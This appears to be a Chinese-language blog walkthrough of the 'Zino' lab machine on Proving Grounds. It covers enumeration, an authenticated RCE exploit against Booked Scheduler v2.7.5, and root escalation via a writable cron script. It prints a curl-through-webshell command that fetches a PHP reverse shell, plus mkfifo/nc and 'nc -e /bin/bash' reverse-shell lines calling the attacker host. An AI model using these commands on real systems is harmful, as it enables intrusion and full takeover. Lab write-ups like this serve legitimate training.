Proving Grounds Practice : Zino Walkthrough

 Proving Grounds Practice : Zino Walkthrough


Foothole (立足點 ) :

  • 8003 發現 CMS : Booked Scheduler v2.7.5
  • 直接使用 PoC 成功拿到 shell

PE ( 提權 ) :

  • 利用 PoC 的 URL 下指令另外建立 Reverse Shell
  • /etc/crontab root 跑一個 pythone 檔案,現有使用者可以修改內容
  • 直接用 nc 建立 Reverse Shell

注意事項 :

  • 學習 Booked Scheduler
  • rm 建立 reverse shell 沒成功後來改直接用 nc 成功


Rustscan,└─$ rustscan -a 192.168.186.64 --scripts none --ulimit 5000 | tee rustscan



snmp filtered,└─$ sudo nmap -sU -p 161 192.168.186.64 | tee snmp




nmap,└─$ sudo nmap -sCV -A -p 21,22,139,445,3306,8003 192.168.186.64 | tee nmap
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql?
8003/tcp open  http        Apache httpd 2.4.38



FTP 測試 anonymous、ftp:ftp、admin:admin 登入皆失敗



MySQL root 測試登入,IP 被拒絕



└─$ enum4linux -a  192.168.186.64                                  



有個資料夾 zino,備註顯示 Logs



檔案抓回來看一下 access.log

/booked/Web



auth.log

使用者名稱 peter,passwd:chauthtok



local.txt 就這樣拿到了



獲得另外一怎帳號密碼 admin:adminadmin



hydra FTP 沒有有效的帳號密碼



hydra SSH 一樣沒有有效的帳號密碼



SMB 測試也沒有發現




8003 /


8003 /booked/Web/?


測試 admin:adminadmin 可以登入



8003 顯示 Booked Scheduler v2.7.5 CMS




查詢 Exploit-DB




第一個是 RCE 且 Authenticated 就先試試看,└─$ searchsploit -m 50594


看一下內容剛好就是 v2.7.5




改一下帳號密碼



這裡有 usage,自作聰明去改了帳號密碼,先將他改回來用 usage 跑跑看



└─$ ./50594.py http://192.168.155.64:8003 admin adminadmin

結果 ......GG 改用 python3 接 PoC 成功


跑了一堆 reverse shell 要建立另外一個 session 都失敗



透過 PoC 內容下 cmd

└─$ curl http://192.168.155.64:8003/booked/Web/custom-favicon.php?cmd=wget%20http%3A%2F%2F192.168.45.202%3A8003%2Fpg%2F64%2Fphp-reverse-shell.php



存取 Reverse Shell PHP,http://192.168.155.64:8003/booked/Web/php-reverse-shell2.php

拿到新的 shell 了



再建立了一個 445 Reverse Shell,開始 PE

cat /etc/passwd

使用者帳號 peter



su peter 失敗



cat /etc/crontab,有個 root 執行的 ptyhon,/var/www/html/booked/cleanup.py



內容如下,重點是現有使用者有權限可以 write




看起來每三分鐘會跑一次



建立另外一個 cleanup.py 來取代,內容直接改 rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.202 445 >/tmp/f



上傳到靶機,然後取代該檔案




445 等了一段時間都沒有進來,將 python 內容改如下

nc -nv 192.168.45.202 445 -e /bin/bash



這一次進來了,whoami & id 確認是管理者




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)